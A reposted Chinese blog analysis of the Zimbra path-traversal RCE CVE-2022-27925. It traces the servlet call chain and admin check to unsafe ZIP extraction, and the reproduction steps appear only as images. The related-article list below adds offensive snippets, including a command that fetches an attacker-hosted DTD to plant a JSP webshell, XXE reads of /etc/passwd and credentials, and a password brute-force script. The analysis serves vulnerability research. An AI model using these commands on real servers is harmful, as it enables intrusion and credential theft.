CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE

最新推荐文章于 2025-10-20 18:38:40 发布
转载 最新推荐文章于 2025-10-20 18:38:40 发布 · 3.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA
文章标签:

#servlet

本文分享了Zimbra RCE漏洞CVE - 2022 - 27925的分析与复现过程。介绍了环境搭建,选择安装v8.8.12版本。通过寻找调用链定位到相关Servlet对象,分析了权限认证逻辑,最终定位到ZIP压缩包解压时存在路径穿越漏洞,可构造特定请求写入shell。

声明

出品|且听安全(ID: QCyber)

以下内容,来自且听安全的公众号作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

漏洞信息

前段时间 Zimbra 官方通报了一个 RCE 漏洞 CVE-2022-27925 ,也有小伙伴在漏洞空间站谈到了这个漏洞,上周末在家有时间完成了漏洞的分析与复现。漏洞原理并不复杂,但在搭建环境的过程中遇到了一些坑,下面将分析过程分享给大家。

图片

从描述来看,这是一个 ZIP 压缩包解析导致路径穿越类型的漏洞。

环境搭建

由于直接安装 v9.0.0 或 v8.8.15 默认就是最新版,因此选择安装 v8.8.12。安装过程非常曲折,环境搭建有疑惑的小伙伴可以加入漏洞空间站进行交流。最终完成安装并启动成功:

图片

通过配置 `mailboxd_java_options` 加入调试信息:

图片

重启 Zimbra 服务即可打开远程调试:

图片

寻找调用链

漏洞出现在`mboximport`相关的功能中,全盘搜索定位到位于

`zimbrabackup.jar`中的`MailboxImpo-rtServlet` :

图片

从命名规则和存在的成员函数`doPost` 来看,`MailboxImportServlet` 应该对应一个`Servlet`对象,但是`MailboxI-mportServlet`继承于`Extension-HttpHandler`而非`HttpServlet` :

图片

所以还需要寻找某种相互之间的转换关系。我们知道Zimbra自定义了 `Servlet`对象的基类`ZimbraServlet` ,搜索其子类:

图片

定位 `ExtensionDispatcherServlet` :

图片

可以找到相关配置:

图片

图片

所以`ExtensionDispatcherServlet` 对应的URL规则为`/service/ex-tension/*` ,回到`ExtensionDispatcherServlet#service`函数:

图片

通过`getHandler`函数来寻找对应的`ExtensionHttpHandler`对象`handler`

(前面定位的 `MailboxImportServlet`正好继承于`ExtensionHttp-Handler`),进入`getHandler`函数:

图片

提取URL中`/service/extension`之后的字符串并赋值给`extPath`,带入

`getHandler` 函数:

图片

返回的`ExtensionHttpHandler`对象来自于`sHandlers`键值对,其中的`key` 来自于`ExtensionHttpHandler#getPath`函数,查看定义:

图片

`ExtensionHttpHandler#getPath` :

图片

图片

`mExtension`为`ZimbraExtension`类型,并且在`init`函数中完成初始化,搜索`ZimbraExtension`子类:

图片

定位 `BackupExtension` ,里面刚好注册了`MailboxImportServlet`类型:

图片

所以构造特定URL将调用`MailboxIm-portServlet`,测试如下:

图片

成功进入

`MailboxImportServlet#doPost`函数处理逻辑。

权限认证分析

下面分析一下`doPost`函数的处理逻辑,首先通过

`getAuthTokenFromCookie`从Cookie中提取token认证信息,并检查是否为管理员权限:

AuthToken authToken = ZimbraServlet.getAuthTokenFromCookie(req, resp);
if (authToken == null || !authToken.isAdmin()) {
    Log.mboxmove.warn("Auth failed");
    this.sendError(resp, 403, "Auth failed");
}

进入`getAuthTokenFromCookie` :

图片

因为这里`isAdminReq`默认为`false`,因此认证后需要携带

`ZM_AUTH_TOKEN`的Cookie值,而非`ZM_ADMIN_AUTH_TOKEN`:

图片

漏洞点定位

通过权限检查后,将会进行一系列参数提取与判断,当提供的`account-name` 等参数通过验证后,将进入第152行`importFrom`函数:

图片

其中`in`来自于 POST请求数据包,进入`importFrom`函数:

图片

提取ZIP压缩包,调用 `restore` 函数:

图片

进入 `getAccountSession` 函数:

图片

实例化`ZipBackupTarget.RestoreAcct-Session` 对象,进入构造函数:

图片

跟进 `unzipToTempFiles` 函数:

图片

ZIP 压缩包解压过程存在路径穿越漏洞,导致可以向任意路径写入 shell 。

漏洞复现

通过上述分析,我们可以构造一个存在路径穿越的 ZIP 压缩包,并发送特定 POST 请求实现压缩包解压路径穿越:

图片

最终写入 shell

图片

Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
4SecNet团队专栏
04-19 6788
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Spring RCE 漏洞 CVE-2022-22965 的终极解决方案
热门推荐
oscar999的专栏
04-01 1万+
Spring框架爆出的RCE(远程命令执行)漏洞,现在这个漏洞有了统一的编号: **CVE-2022-22965**。 这个漏洞的主要原因是在JDK 9+版本里,Spring MVC 的数据绑定时出现的漏洞
严重 Zimbra RCE 漏洞遭大规模利用(CVE-2024-45519)
网络研究观
10-02 2653
攻击者正在积极利用 CVE-2024-45519,这是一个严重的 Zimbra 漏洞,该漏洞允许他们在易受攻击的安装上执行任意命令。
Zimbra 紧急修复 Chat Proxy 配置中的严重SSRF漏洞
最新发布
smellycat000的专栏
10-20 70
ICS (iCalendar) 文件通常是用于存储和交换应用之间事件数据的明文格式,但该漏洞源自对 HTML 内容的清理不充分,可导致在用户会话中执行任意 JavaScript。Zimbra 发布公告提到,“我们建议所有,尤其是使用 Zimbra 10.1.5至10.1.11的用户和管理员,立即应用该更新。发布紧急补丁 (10.1.12),修复了位于聊天代理配置中的一个严重的服务器端请求伪造 (SSRF) 漏洞,督促所有管理员立即更新。Zimbra 软件曝新漏洞,发送恶意邮件即可劫持Zimbra 服务器。
Zimbra SSRF+Memcached+反序列化漏洞利用复现
fnmsd的博客
04-12 9035
前言 之前懒了一下,没复现memcached反序列化的部分。 在看本文之前请先看完上一篇复现: https://blog.youkuaiyun.com/fnmsd/article/details/88657083 本篇复现基于8.7.11进行复现,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
CVE-2022-27925 Zimbra任意文件上传漏洞复现
热爱学习,喜欢折腾!
10-26 6392
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
SCANV团队:警惕Zimbra高危安全漏洞
爱尖刀科技媒体 - 曲子龙
12-10 1280
【警惕Zimbra高危安全漏洞】近日,scanv团队监测到国外安全研究者在exploit-db网站上披露的关于Zimbra高危“0day”安全漏洞及攻击代码,攻击者利用漏洞可读取邮件服务器上的任意文件,通过获取到的LDAP信息,即可得到所有用户的密码HASH散列。   用户密码采用OpenLADP SHA算法,通过GPU运算即可暴力破解,该漏洞将为企业或机构带来非常严重的数据泄露风险。攻击者还
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
然而,在 SpringCloud Function 中存在一个 SpEL 注入漏洞CVE-2022-22963),该漏洞可能会导致攻击者可以执行恶意代码,从而导致严重的安全问题。 SpEL(Spring Expression Language)是一种强大的表达式语言,...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破。
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
Zimbra漏洞
公众号shadow sock7
08-19 1745
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
Zimbra漏洞复现
Ryana2的博客
08-07 1338
3.生成含有木马的.jsp文件,命名为MM.jsp,语句为:python3 zimbra.py -u https://192.168.42.131 -d http://192.168.42.128:8686/exp.dtd -n Hh -f MM.jsp。扫描该站点目录:dirsearch -u https://192.168.42.131 ,看看有什么有用的信息,发现没什么有用信息。2.将抓到的包放入Repeater,并修改包内容,发现内容通过XXE漏洞被读出。尝试利用CVE-2019-9670漏洞
开源邮件平台Zimbra 出现新漏洞,用户登录凭据可被盗
smellycat000的专栏
06-15 2194
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 邮件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者邮箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
zimbra漏洞利用
kzyyx的博客
08-31 4756
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra存在多个漏洞。 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 3621
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
TA473 使用 Zimbra 漏洞攻击欧洲与北约的邮件系统
wangluoanquan111的博客
08-03 3683
研究人员跟踪发现了部分可能是自定义 CSRF JavaScript 代码的实例,这些代码通过 CVE-2022-27926 来进行攻击。TA473 将其作为URL 超链接嵌入钓鱼邮件的正文中,这些 CSRF JavaScript 代码会由存在漏洞的邮件服务器执行。这些 JavaScript代码复制并依赖于模拟本机 Web 邮件门户的 JavaScript 代码,以返回攻击目标的用户名、密码与 CSRF Token 等关键 Web请求详细信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值